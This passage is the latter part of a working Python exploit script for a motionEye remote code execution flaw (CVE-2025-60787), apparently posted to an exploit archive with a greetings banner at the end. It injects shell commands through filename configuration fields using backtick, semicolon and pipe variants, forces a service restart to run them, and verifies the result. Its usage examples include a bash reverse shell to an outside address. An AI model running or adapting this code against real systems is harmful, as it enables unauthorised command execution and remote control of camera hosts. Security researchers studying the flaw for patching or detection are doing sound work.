f"`{safe_command}`.%Y-%m-%d-%H-%M-%S",
f";{safe_command};.%Y-%m-%d-%H-%M-%S",
f"|{safe_command}|.%Y-%m-%d-%H-%M-%S",
]
logger.info(f"Injecting payload into camera: {camera_id}")
response = self._make_request('GET', '/', timeout=10)
if response:
token = self._extract_csrf_token(response.text)
if token:
self.csrf_token = token
logger.debug("Refreshed CSRF token")
endpoints = [
f"/{camera_id}/config/set",
"/config/set",
f"/{camera_id}/edit",
"/config/update",
"/settings/camera",
]
for endpoint in endpoints:
for idx, payload in enumerate(payload_variants):
logger.debug(f"Trying endpoint: {endpoint} with payload variant {idx + 1}")
data = {
'still_images_image_file_name': payload,
'movie_file_name': payload,
'timelapse_file_name': payload,
}
if self.csrf_token:
data['csrf_token'] = self.csrf_token
headers = {}
if self.csrf_token:
headers['X-CSRFToken'] = self.csrf_token
response = self._make_request('POST', endpoint, data=data, headers=headers)
if not response:
continue
success, message = self._check_response_success(response)
if success:
logger.info(f"Payload injected successfully via {endpoint}")
logger.debug(f"Success message: {message}")
return True
logger.debug(f"Endpoint {endpoint} returned: {message}")
logger.error(f"Failed to inject payload through any endpoint for camera {camera_id}")
return False
def restart_motion(self) -> bool:
"""
Attempt to restart motion service through various endpoints.
"""
logger.info("Attempting to restart motion service")
if not self.authenticated and not self.login():
logger.error("Not authenticated")
return False
restart_endpoints = [
('/action/restart', 'POST', {}),
('/action/restart_motion', 'POST', {}),
('/action/restart_all', 'POST', {}),
('/config/restart', 'POST', {}),
('/restart', 'GET', {}),
('/api/restart', 'POST', {'Content-Type': 'application/json'}),
]
for endpoint, method, headers in restart_endpoints:
logger.debug(f"Trying {method} {endpoint}")
data = {}
if self.csrf_token and method == 'POST':
data['csrf_token'] = self.csrf_token
try:
if method == 'POST':
response = self._make_request('POST', endpoint, data=data, headers=headers)
else:
response = self._make_request('GET', endpoint, headers=headers)
if response:
if response.status_code in [200, 202, 204, 302]:
logger.info(f"Restart triggered via {endpoint}")
return True
else:
logger.debug(f"Endpoint {endpoint} returned {response.status_code}")
except Exception as e:
logger.debug(f"Error with {endpoint}: {e}")
continue
logger.warning("Could not trigger restart automatically")
return False
def verify_exploit(self, expected_file: str = "/tmp/pwned_verified") -> bool:
"""
Verify if the exploit was successful by checking for expected evidence.
Returns True if verification succeeded, False if failed or inconclusive.
"""
logger.info("Verifying exploit success...")
if self.last_command and 'touch' in self.last_command:
touch_match = re.search(r'touch\s+([^\s;|&]+)', self.last_command)
if touch_match:
expected_file = touch_match.group(1)
logger.info(f"Looking for created file: {expected_file}")
filename = expected_file.split('/')[-1] if '/' in expected_file else expected_file
web_paths = [
f"/motion/{filename}",
f"/static/{filename}",
f"/media/{filename}",
f"/{filename}",
]
for web_path in web_paths:
response = self._make_request('GET', web_path, timeout=10)
if response and response.status_code == 200:
logger.info(f"Found expected file at {web_path}")
return True
logger.info("=" * 60)
logger.info("MANUAL VERIFICATION REQUIRED:")
logger.info(f"Target: {self.target_url}")
logger.info(f"Command executed: {self.last_command or 'unknown'}")
logger.info(f"Expected evidence: {expected_file}")
logger.info("\nTo verify on Docker:")
logger.info(f" docker exec motioneye ls -la {expected_file}")
logger.info("\nTo verify on system:")
logger.info(f" ls -la {expected_file}")
logger.info("\nTo verify via web (if accessible):")
logger.info(f" curl -k {self.target_url}/motion/")
logger.info("=" * 60)
return False
def run(self, command: str) -> Dict[str, bool]:
"""
Execute the full exploit chain.
Returns dictionary with status of each step.
"""
results = {
'login': False,
'cameras': False,
'injection': False,
'restart': False,
'verification': False,
'overall': False
}
self.last_command = command
logger.info("=" * 60)
logger.info("Starting motionEye RCE exploit")
logger.info(f"Target: {self.target_url}")
logger.info(f"Command: {command}")
logger.info("=" * 60)
if not self._check_dependencies():
logger.error("Dependencies check failed")
return results
if not self.login():
logger.error("Login failed. Exiting.")
return results
results['login'] = True
if not self.get_cameras():
logger.error("Failed to get camera list")
return results
results['cameras'] = True
injection_success = False
for camera in self.cameras:
if self.inject_payload(camera['id'], command):
injection_success = True
break
if not injection_success:
logger.error("Failed to inject payload into any camera")
results['injection'] = False
return results
results['injection'] = True
if self.restart_motion():
results['restart'] = True
wait_time = 10
logger.info(f"Waiting {wait_time} seconds for command execution...")
time.sleep(wait_time)
results['verification'] = self.verify_exploit()
results['overall'] = injection_success
logger.info("=" * 60)
logger.info("Exploit execution completed")
logger.info(f"Results: {results}")
logger.info("=" * 60)
return results
def main():
"""
Main function with argument parsing.
"""
import argparse
parser = argparse.ArgumentParser(
description="MotionEye <= 0.43.1b4 RCE Exploit (CVE-2025-60787)",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -t http://192.168.1.100:8765 -c "touch /tmp/pwned"
%(prog)s -t https://motioneye.local -c "id > /tmp/output" -v
%(prog)s -t http://localhost:9999 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" --dangerous
"""
)
parser.add_argument('-t', '--target', required=True,
help='Target URL (e.g., http://127.0.0.1:8765)')
parser.add_argument('-u', '--username', default='admin',
help='Username (default: admin)')
parser.add_argument('-p', '--password', default='',
help='Password (default: empty)')
parser.add_argument('-c', '--command',
default='touch /tmp/pwned_by_exploit',
help='Command to execute (default: touch /tmp/pwned_by_exploit)')
parser.add_argument('-v', '--verbose', action='store_true',
help='Enable verbose output')
parser.add_argument('--dangerous', action='store_true',
help='Acknowledge that the command may be dangerous')
parser.add_argument('--camera', help='Specific camera ID to target (default: auto-detect)')
parser.add_argument('--timeout', type=int, default=30,
help='Request timeout in seconds (default: 30)')
args = parser.parse_args()
if args.verbose:
logger.setLevel(logging.DEBUG)
dangerous_patterns = ['bash -i', 'nc ', 'reverse', 'shell', 'exec', '/dev/tcp/']
if any(pattern in args.command.lower() for pattern in dangerous_patterns) and not args.dangerous:
logger.warning(" Command appears to be potentially dangerous!")
logger.warning("Use --dangerous flag to proceed with this command")
sys.exit(1)
exploit = MotionEyeExploit(
target_url=args.target,
username=args.username,
password=args.password,
timeout=args.timeout
)
try:
results = exploit.run(args.command)
if results['overall']:
if results['verification']:
logger.info(" Exploit fully successful - command execution verified")
sys.exit(0)
else:
logger.info(" Exploit likely successful - manual verification required")
sys.exit(2)
else:
logger.error(" Exploit failed")
sys.exit(1)
except KeyboardInterrupt:
logger.info("\nExploit interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == "__main__":
main()
Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================